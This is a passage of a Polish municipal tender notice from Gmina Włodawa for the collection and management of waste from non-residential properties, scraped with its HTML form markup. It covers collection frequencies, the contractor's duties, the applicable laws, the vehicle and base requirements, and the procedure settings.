zachowaniem następującej częstotliwości (hotele i budynki zakwaterowania turystycznego, handlowo-usługowe, szkoły itp.), z zastrzeżeniem pkt 2:a)	odpady pozostałe po segregacji odpadów (zmieszane) będą odbierane nie rzadziej niż raz w miesiącu;b)	odpady ulegające biodegradacji, w tym odpady opakowaniowe ulegające biodegradacji będą odbierane nie rzadziej niż raz w miesiącu;c)	papier, w tym tektura i odpady opakowaniowe z papieru i tektury będą odbierane nie rzadziej niż co dwa miesiące;d)	metal, tworzywa sztuczne w tym odpady opakowaniowe tworzyw sztucznych, oraz opakowaniowe wielomateriałowe będą odbierane nie rzadziej niż co dwa miesiące;e)	szkło, w tym odpady opakowaniowe ze szkła będą odbierane nie rzadziej niż co dwa miesiące;2.	Z nieruchomości niezamieszkałych, na których powstają odpady komunalne położonych w Okunince i Orchówku (hotele i budynki zakwaterowania turystycznego, handlowo-usługowe itp.) w okresie lipiec-sierpień będą odbierane nie rzadziej niż raz w tygodniu.3.	Z nieruchomości niezamieszkałych, na których znajdują się domki letniskowe lub innych nieruchomości wykorzystywanych jedynie przez część roku w celach rekreacyjno-wypoczynkowych z następującą częstotliwością z zastrzeżeniem pkt 4):a)	odpady pozostałe po segregacji odpadów komunalnych (odpady zmieszane) będą odbierane nie rzadziej niż raz w miesiącu, z zastrzeżeniem lit. b;b)	odpady pozostałe po segregacji odpadów komunalnych (odpady zmieszane) i odpady ulegające biodegradacji, w tym odpady opakowaniowe ulegające biodegradacji w okresie czerwiec-sierpień będą odbierane nie rzadziej niż dwa razy w miesiącu.c)	papier, w tym tektura i odpady opakowaniowe z papieru i tektury będą odbierane nie rzadziej niż co dwa miesiące;d)	metal, tworzywa sztuczne, w tym odpady opakowaniowe tworzyw sztucznych, oraz opakowaniowe wielomateriałowe będą odbierane nie rzadziej niż co dwa miesiące;e)	szkło, w tym odpady opakowaniowe ze szkła będą odbierane nie rzadziej niż co dwa miesiące;f)	popiół i żużle paleniskowe, zużyty sprzęt elektryczny i elektroniczny, meble i inne odpady wielkogabarytowe będą odbierane nie rzadziej niż dwa razy w roku w okresowych akcjach zbierania tych odpadów.4.	Z nieruchomości położonych w Okunince i Orchówku, na których znajdują się domki letniskowe lub innych nieruchomości wykorzystywanych jedynie przez część roku w celach rekreacyjno-wypoczynkowych, nie rzadziej niż dwa razy w miesiącu w okresie czerwiec-sierpień odbierane będą następujące odpady:a)	papier, w tym tektura i odpady opakowaniowe z papieru i tektury;b)	metal, tworzywa sztuczne,c)	szkło, w tym odpady opakowaniowe ze szkła,d)	odpady wielkogabarytowe będą odbierane nie rzadziej niż dwa razy w roku w okresowych akcjach zbierania tych odpadów.e)	Odpady pozostałe po segregacji odpadów komunalnych (odpady zmieszane) i odpady ulegające biodegradacji, w tym odpady opakowaniowe ulegające biodegradacji będą odbierane w każdy poniedziałek miesiąca;IV. Obowiązki Wykonawcy i Zamawiającego przed rozpoczęciem oraz w trakcie realizowania zamówienia:Obowiązkiem Wykonawcy będzie:1.	Opracowanie harmonogramu odbioru odpadów komunalnych, który winien być uzgodniony i zatwierdzony przez Zamawiającego, jeszcze przed podpisaniem umowy.2.	Wszelkie zmiany harmonogramu będą wymagały zgody Zamawiającego, a Wykonawca będzie obowiązany dostarczyć jego zaktualizowaną wersję do każdej nieruchomości, której ta zmiana dotyczy.3.	Realizacja ,,reklamacji" (tj. nieodebrania z nieruchomości worków lub nieopróżnienia pojemników zgodnie z harmonogramem) - w przeciągu 24 godzin, termin ten, liczy się od następnego dnia po dniu zgłoszenia reklamacji. Załatwienie reklamacji należy niezwłocznie zgłosić do Zamawiającego w dowolnie wybranej przez Wykonawcę formie.4.	Aktualny harmonogram odbioru odpadów w okresie objętym niniejszym zamówieniem, Zamawiający będzie publikował na stronie internetowej www.gmina-wlodawa.pl. Oraz w sposób zwyczajowo przyjęty np. tablice informacyjne.5.	Usługa winna być realizowana od poniedziałku do piątku w godzinach od 7:00 do 17:00.6.	Wykonawca, o ile zaistnieje taka potrzeba, obowiązany jest w ramach umowy na odbiór i zagospodarowanie odpadów komunalnych zawartej z Zamawiającym, do dystrybucji informacji związanych z zasadami odbioru odpadów komunalnych wśród właścicieli nieruchomości niezamieszkałych, na których powstają odpady komunalne. Informacje te, nie będą wymagały potwierdzenia odbioru, a konieczność ich doręczenia będzie przypadała wyłącznie w dniu odbioru odpadów, wyznaczonym w harmonogramie.7.	Wykonawca zobowiązany jest do przekazania Zamawiającemu, za każdy miesiąc wykonanej usługi, faktury wraz z kartami przekazania odpadów, w tym ilości odebranych i zagospodarowanych odpadów, które nie podlegają dodatkowemu wynagrodzeniu, oraz wykaz załączników.8.	Wykonawca obowiązany jest do przekazania Zamawiającemu półrocznych sprawozdań, o których mowa w art. 9n ust. 1 ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminach (Dz. U. z 2018 r., poz. 1454 z późn. zm.). Sprawozdanie jest przekazywane Zamawiającemu w terminie do końca miesiąca następującego po upływie półrocza, którego dotyczy.9.	Przekazanie odebranych odpadów komunalnych do zakładu zagospodarowania zgodnie z hierarchią postępowania z odpadami komunalnymi.10.	Odpady odebrane od właścicieli nieruchomości, Wykonawca obowiązany jest dostarczyć do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych, zgodną z Wojewódzkim Planem Gospodarki Odpadami Komunalnymi 2022 z późn. zm.11.	Za szkody w majątku Zamawiającego lub osób trzecich spowodowane w trakcie odbioru odpadów, odpowiedzialność ponosi Wykonawca.12.	Przed rozpoczęciem realizacji zamówienia, Zamawiający dostarczy Wykonawcy szczegółowy wykaz adresów nieruchomości objętych niniejszym zamówieniem.13.	W celu weryfikacji danych zawartych w sprawozdaniu, o którym mowa w art. 9n ustawy o utrzymaniu czystości i porządku w gminach, Zamawiający może żądać od Wykonawcy okazania dokumentów potwierdzających osiągnięcie określonych poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowiska, zgodnie z art. 9p ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2018 r. poz. 1454 z późn. zm.).14.	Wykonawca zobowiązany jest do przechowywania w swojej siedzibie danych pochodzących z systemu monitoringu GPS przez okres 5 lat od dnia ich zapisania.15.	Usunięcie wszelkich nieprawidłowości dotyczących funkcjonowania systemu GPS leży po Stronie Wykonawcy i powinno być wykonane niezwłocznie po ich wystąpieniu. Wykonawca zobowiązany jest wyjaśnić Zamawiającemu przyczynę nieprawidłowości w funkcjonowaniu systemu GPS w każdym przypadku jej wystąpienia. Jako nieprawidłowość Zamawiający uznaje wszelkie nieuzasadnione odstępstwa od prawidłowego działania systemu GPS. W przypadku awarii odbiornika GPS w pojeździe i serwisowania go, Wykonawca prześle do Zamawiającego kopię zgłoszenia serwisowego bądź każdego innego zgłoszenia, które Wykonawca prześle do Usługodawcy GPS.16.	W przypadku zgłoszenia potrzeby dostarczenia kodów kreskowych przez właściciela nieruchomości, Wykonawca ma obowiązek dostarczyć te kody nieodpłatnie, przy okazji najbliższej zbiórki odpadów.17.	Wykonawca zobowiązany jest do prowadzenia ewidencji odebranych worków i/lub pojemników z odpadami za pomocą systemu elektronicznego poprzez odczyt kodów kreskowych, a w razie braku odpowiedniego kodu kreskowego winien prowadzić ewidencję papierową lub w innej formie (z pominięciem użycia kodów kreskowych) umożliwiającą stwierdzenie odbioru odpadów z danej nieruchomości deklaracyjnej.18.	Wykonawca zobowiązany będzie do ważenia wszystkich odebranych odpadów komunalnych na legalizowanej wadze i przechowywania dokumentacji pomiarów do wglądu Zamawiającego, przez okres wykonywania zamówienia i do dwóch miesięcy po jego zakończeniu.19.	Wykonawca zobowiązany jest do utrzymywania standardów sanitarnych oraz standardów ochrony środowiska zgodnie z Rozporządzeniem Ministra Środowiska w sprawie bezpieczeństwa i higieny pracy przy gospodarowaniu odpadami komunalnymi (Dz. U. z 2009 r. Nr 104, poz. 868) i postanowieniami regulaminu utrzymania czystości i porządku obowiązującego na terenie gminy.20.	Wykonawca zobowiązany jest składać wraz z każdą wystawioną fakturą za wykonaną usługę, załącznik w formie miesięcznego sprawozdania (załącznik nr 6) o każdym przypadku postępowania przez właścicieli danej nieruchomości w sposób niezgodny z przepisami prawa, w szczególności:a)	nieruchomości, na której powstały i zostały odebrane odpady komunalne nie ujęte w bazie danych prowadzonej przez Zamawiającego,b)	nie prowadzenia segregacji odpadów, pomimo zadeklarowania przez właściciela nieruchomości zbiórki odpadów,c)	Wykonawca zobowiązany jest również do przekazywania raportu o ilości odebranych odpadów komunalnych z poszczególnych nieruchomości. Informacje te będą przekazywane Zamawiającemu w pliku csv lub za pomocą systemu GOMiG odpady.21.	Wykaz nieruchomości, objętych niniejszym zamówieniem z uwzględnieniem sytuacji opisanej w pkt 20 powinien zawierać:a)	dokładny adres nieruchomości,b)	opis niezgodności oraz datę jej stwierdzenia,c)	dane pracowników Wykonawcy, którzy stwierdzili fakt wystąpienia niezgodności oraz oświadczenia przez nich przekazane (oświadczenia o stwierdzeniu niezgodności powinno zostać opatrzone podpisem pracownika, który stwierdził niezgodność).22.	Wszystkie dołączone do sprawozdania wykazy muszą być podpisane przez osobę upoważnioną lub działającą w imieniu Wykonawcy na podstawie pełnomocnictwa,23.	W przypadku przedłożenia kserokopii dokumentów muszą one zostać poświadczone przez upoważnionego reprezentanta Wykonawcy za zgodność z oryginałem,24.	Do sprawozdania miesięcznego do faktury należy dołączyć wykaz (spis) przedłożonych załączników w formie sprawozdania ponumerowanych kolejnymi numerami porządkowymi,25.	Podstawą do rozliczeń pomiędzy Zamawiającym a Wykonawcą, a tym samym do wystawienia faktury za usługę wykonaną w danym miesiącu kalendarzowym, będą ilości odpadów komunalnych przekazanych do zagospodarowania, udokumentowane stosownymi kartami przekazania odpadów, wraz z załącznikami.26.	Wykonawca zobowiązany jest do przechowywania dokumentacji związanej z realizacją zamówienia przez cały okres trwania zamówienia plus dodatkowo 5 lat po zakończeniu realizacji zamówienia (w tym odręcznych list odbioru odpadów wykonywanych przez pracowników Wykonawcy).27.	Wykonawca winien na każde pisemne żądanie Zamawiającego udzielić wszelkich danych oraz informacji związanej z realizacją przedmiotu zamówienia. Wykonawca zobowiązany jest do niezwłocznego przekazywania informacji dotyczących realizacji zamówienia, na każde żądanie Zamawiającego, jednak nie później niż w terminie 7 dni roboczych od dnia otrzymania żądania (w tym odręcznych list odbioru odpadów sporządzonych przez pracowników). UWAGA!Wydrukowanie samoprzylepnych naklejek z kodami kreskowymi, a także sporządzenia i dystrybucji harmonogramu odbierania odpadów komunalnych z nieruchomości oraz koszt odbioru i zagospodarowania odpadów niefakturowanych, Wykonawca powinien uwzględnić w cenach jednostkowych i obliczonej na ich podstawie łącznej ceny ofertowej.V. Wymogi dotyczące przekazywania odpadów.1.	Wykonawca zobowiązany jest do przestrzegania w trakcie realizacji zamówienia przepisów prawa, w szczególności takich jak: ustawa z dnia 6 marca 2018 r. Prawo przedsiębiorców (Dz. U. z 2018 r., poz. 650), ustawa z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2018 r., poz. 992 z późn. zm..), ustawa z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2018 r., 1454z późn. zm.) ustawa z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (Dz. U. z 2018, poz. 799 z późn. zm.), ustawa z dnia 29 lipca 2005 r. o zużytym sprzęcie elektrycznym i elektronicznym (Dz. U. z 2018, poz. 1466 z późn. zm.), ustawa z dnia 24 kwietnia 2009 r. o bateriach i akumulatorach (Dz. U. z 2016 r., poz. 1803 z późn. zm.), ustawa z dnia 18 lipca 2001 r. Prawo wodne ( Dz. U. z 2018 r., poz. 2268 z późn. zm.), rozporządzenie Ministra Środowiska z dnia 16 czerwca 2009 r. w sprawie bezpieczeństwa i higieny pracy przy gospodarowaniu odpadami komunalnymi (Dz. U. 2009 r., nr 104 poz. 868), rozporządzenie Ministra Środowiska z dnia 8 grudnia 2010 r. w sprawie wzorów dokumentów stosowanych na potrzeby ewidencji i odpadów (Dz. U. 2014 r., poz. 1973), Rozporządzenie Ministra Środowiska z dnia 27 września 2001 r. w sprawie katalogu odpadów (Dz. U. 2014, poz. 1923), rozporządzenie Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U z 2016 r., poz. 2167 z późn. zm.), Rozporządzenie Ministra Środowiska z dnia 17 czerwca 2016 r. w sprawie wzorów sprawozdań o odebranych i zebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarki odpadami komunalnymi (Dz. U. z 2016 r., poz. 934), rozporządzenie Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczenia masy tych odpadów (Dz. U. z 2017 r., poz. 2412), uchwała Nr XXIV/350/16 Sejmiku Województwa Lubelskiego z dnia 30 lipca 2012 r. w sprawie uchwalenia ,,Planu gospodarki odpadami dla województwa lubelskiego 2022 " z późn. zm</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">90000000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90513100-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90500000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90533000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>90514000-3</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2019-12-31</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Warunek ten zostanie spełniony, jeśli Wykonawca:a)	Będzie posiadał aktualne zaświadczenie o wpisie do rejestru działalności regulowanej w Gminie Włodawa zgodnie z art. 9 c ust. 1 ustawy o utrzymaniu czystości i porządku w gminach z dnia 13 września 1996 r. (Dz.U.2018.1454 t.j.)b)	będzie posiadał zezwolenie na zbieranie odpadów oraz transport odpadów zgodnie z art. 41 ust. 3 pkt. 2 i art. 233 ust. 3 ustawy z 14 grudnia 2012 r. o odpadach (Dz.U.2018.992 t.j.)</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie dokonuje opisu wymagań w tym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">a)	Warunek będzie spełniony jeśli Wykonawca będzie posiadał bazę magazynowo - transportową usytuowaną na terenie Gminy Włodawa lub w odległości nie większej niż 60 km od jej granic, do którego Wykonawca posiada tytuł prawny.b)	W zakresie wyposażenia bazy magazynowo - transportowej należy zapewnić aby:a.	teren bazy magazynowo - transportowej zabezpieczony był w sposób uniemożliwiający wstęp osobom nieupoważnionym,b.	miejsca przeznaczone do parkowania pojazdów były zabezpieczone przed emisją zanieczyszczeń do gruntu,c.	miejsca magazynowania selektywnie zebranych odpadów komunalnych były zabezpieczone przed emisją zanieczyszczeń do gruntu oraz zabezpieczone przez działaniem czynników atmosferycznych,d.	teren bazy magazynowo - transportowej był wyposażony w urządzenia lub systemy zapewniające zagospodarowanie wód opadowych i ścieków przemysłowych, pochodzących z terenu bazy zgodnie z wymaganiami określonymi przepisami ustawy z dnia 18 lipca 2001 r. - Prawo wodne (Dz.U.2018.2268 t.j.).c)	Na terenie bazy magazynowo - transportowej powinny znajdować się:a.	miejsca przeznaczone do parkowania pojazdów,b.	pomieszczenie socjalne dla pracowników odpowiadające ilości zatrudnionych osób,c.	miejsca do magazynowania selektywnie zebranych odpadów z grupy odpadów komunalnych,d.	legalizowaną samochodową wagę najazdową - w przypadku gdy na terenie bazy następuje magazynowanie odpadów,e.	punkt bieżącej konserwacji i napraw pojazdów - o ile czynności te nie są wykonywane przez uprawnione podmioty zewnętrzne poza terenem bazy magazynowo - transportowej,f.	miejsce do mycia i dezynfekcji pojazdów - o ile czynności te nie są wykonywane przez uprawnione podmioty zewnętrzne poza terenem bazy magazynowo - transportowej,g.	część transportowa oraz część magazynowa bazy mogą znajdować się na oddzielnych terenach, przy jednoczesnym spełnieniu warunków określonych powyżej,d)	Wymagania techniczne dla pojazdów i urządzeń oraz ich utrzymania w odpowiednim stanie sanitarnym. Wykonawca powinien zapewnić, aby:a.	urządzenia do selektywnego gromadzenia odpadów komunalnych na terenie bazy magazynowo - transportowej utrzymane były we właściwym stanie technicznym i sanitarnym, b.	pojazdy i urządzenia były zabezpieczone przed niekontrolowanym wydostawaniem się na zewnątrz odpadów, podczas ich magazynowania, przeładunku, a także transportu,c.	pojazdy i urządzenia były poddawane myciu i dezynfekcji z częstotliwością gwarantującą zapewnienie im właściwego stanu sanitarnego, nie rzadziej niż raz na miesiąc, a w okresie letnim nie rzadziej niż raz na 2 tygodnie,d.	podmiot odbierający odpady komunalne od właścicieli nieruchomości posiadał aktualne dokumenty potwierdzające wykonanie czynności, o których mowa w pkt c,e.	na koniec każdego dnia roboczego pojazdy były opróżnione z odpadów i były parkowane wyłącznie na terenie bazy magazynowo - transportowej,f.	pojazdy były wyposażone w system monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postojów, załadunku i wyładunku odpadów. Zapis tych danych Wykonawca na wezwanie Zamawiającego zobowiązany jest udostępnić.g.	pojazdy były wyposażone w narzędzia lub urządzenia umożliwiające sprzątanie terenu po opróżnianiu pojemników.h.	pojazdy przystosowane do odbioru odpadów komunalnych winny mieć zamontowaną kamerę samochodową, by w przypadku zastrzeżeń do pracy osób odbierających odpady komunalne, Zamawiający mógł korzystać z rejestratora trasy, celem rozwiązania wszelkich wątpliwości.e)	W zakresie posiadania wyposażenia umożliwiającego odbieranie odpadów komunalnych od właścicieli nieruchomości oraz jego odpowiedniego stanu technicznego należy zapewnić, aby:a. pojazdy były trwałe i czytelnie oznakowane (w widocznym miejscu) nazwą firmy oraz danymi adresowymi i numerem telefonu podmiotu odbierającego odpady komunalne od właścicieli nieruchomości,b. na terenie bazy magazynowo - transportowej znajdowały się urządzenia do selektywnego gromadzenia odpadów komunalnych przed ich transportem do miejsca przetwarzania. Warunek będzie spełniony jeśli Wykonawca będzie posiadał: a.	Samochód hakowy z możliwością załadunku kontenera KP-7 o pojemności 7 000 litrów - co najmniej jedna sztuka,b.	Samochód bezpylny z funkcją kompaktującą tzw. śmieciarka do odbierania odpadów komunalnych segregowanych i zmieszanych - co najmniej trzy sztuki,c. Samochód bez funkcji kompaktującej - co najmniej trzy sztuki.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">a)	Aktualne zaświadczenie o wpisie do rejestru działalności regulowanej w Gminie Włodawa zgodnie z art. 9 c ust. 1 ustawy o utrzymaniu czystości i porządku w gminach z dnia 13 września 1996 r. (Dz.U.2018.1454 t.j.)b)	Zezwolenie na zbieranie odpadów oraz transport odpadów zgodnie z art. 41 ust. 3 pkt. 2 i art. 233 ust. 3 ustawy z 14 grudnia 2012 r. o odpadach (Dz.U.2018.992 t.j.)c)	Wykaz wyposażenia zakładu dostępnego Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami oraz dokumentami potwierdzanie spełniania norm emisji spalin EURO 5</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta">z kilkoma wykonawcami</span> <br/> Czy przewiduje się 